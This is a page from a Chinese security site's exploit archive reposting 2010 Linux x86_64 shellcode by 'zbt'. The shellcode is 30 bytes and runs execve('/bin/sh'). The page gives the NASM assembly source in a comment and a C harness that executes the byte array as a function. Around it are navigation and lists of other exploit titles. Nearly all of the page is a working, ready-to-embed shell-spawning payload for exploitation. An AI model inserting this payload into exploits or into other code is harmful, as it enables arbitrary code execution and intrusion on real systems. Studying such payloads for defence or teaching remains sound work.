首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
来源:vfocus.net 作者:zbt 发布时间:2010-04-26  

# Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
# Date: 2010-04-26
# Author: zbt
# Tested on: x86_64 Debian GNU/Linux

/*
 ; execve("/bin/sh", ["/bin/sh"], NULL)

 section .text
      global _start

 _start:
      xor     rdx, rdx
      mov     qword rbx, '//bin/sh'
      shr     rbx, 0x8
      push    rbx
      mov     rdi, rsp
      push    rax
      push    rdi
      mov     rsi, rsp
      mov     al, 0x3b
      syscall
*/

int main(void)
{
 char shellcode[] =
 "\x48\x31\xd2"                                  // xor    %rdx, %rdx
 "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov
$0x68732f6e69622f2f, %rbx
 "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
 "\x53"                                          // push   %rbx
 "\x48\x89\xe7"                                  // mov    %rsp, %rdi
 "\x50"                                          // push   %rax
 "\x57"                                          // push   %rdi
 "\x48\x89\xe6"                                  // mov    %rsp, %rsi
 "\xb0\x3b"                                      // mov    $0x3b, %al
 "\x0f\x05";                                     // syscall

 (*(void (*)()) shellcode)();
 
 return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux/x86_64 reboot(POWER_OFF)
·linux/x86 sends "Phuck3d!" to
·WM Downloader v3.0.0.9 Buffer
·Rumba ftp Client 4.2 PASV BoF
·WebKit <= 532.5 Stack Exhausti
·Easyzip 2000 v3.5 (.zip) 0day
·IDEAL Administration 2010 v10.
·MacOS X 10.6 HFS File System A
·IDEAL Migration 2009 v4.5.1 Lo
·ZipWrangler 1.20 (.zip) SEH 0d
·Avast! 4.7 aavmker4.sys privil
·HP Digital Imaging (hpodio08.d
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved